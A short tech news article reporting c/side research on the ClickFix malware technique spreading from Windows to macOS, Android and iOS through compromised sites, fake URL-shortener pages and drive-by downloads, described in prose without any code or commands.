Devious New ClickFix Malware Variant Targets macOS, Android, and iOS Using Browser-Based Redirections
The infamous hacking technique known as ClickFix has evolved, experts have warned, with new research revealing that it now targets not only Windows devices but also macOS, iOS, and Android devices. The malicious technique tricks users into running malware by disguising itself as a legitimate problem-solving solution.
According to c/side, the researchers behind the study, the new attack method starts with a compromised website. Threat actors inject JavaScript code that redirects users to a new browser tab when they click on certain elements on the page. The new tab then displays a page that looks like a legitimate URL shortener, complete with a message instructing users to copy and paste a link into their browser. However, doing so triggers yet another redirect, leading to a download page.
Here's where the technique diverges depending on the operating system of the victim. On macOS, the attack leads to a terminal command that fetches and executes a malicious shell script, which has already been flagged by multiple antivirus programs as suspicious.
But for Android and iOS users, the situation is even more concerning. The attack no longer requires any user interaction, making it a drive-by attack. This type of cyberattack sees malicious code executed or downloaded onto a device simply by visiting a compromised or malicious webpage, with no clicks, installs, or interaction required.
In this case, the site downloads a .TAR archive file containing malware, which has also been flagged by at least five antivirus programs. According to c/side, "This is a fascinating and evolving attack that demonstrates how attackers are expanding their reach." The study found that what started as a Windows-specific ClickFix campaign has now expanded its scope to target macOS, Android, and iOS devices.
This development highlights the ever-evolving nature of cyber threats. As attackers continually adapt and improve their tactics, it's essential for users to remain vigilant and take steps to protect themselves against these types of attacks. By staying informed and using reputable security software, individuals can reduce their risk of falling victim to these types of malicious schemes.
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features, and guidance your business needs to succeed! As a pro, you'll receive exclusive content and expert insights to help you navigate the ever-changing world of technology.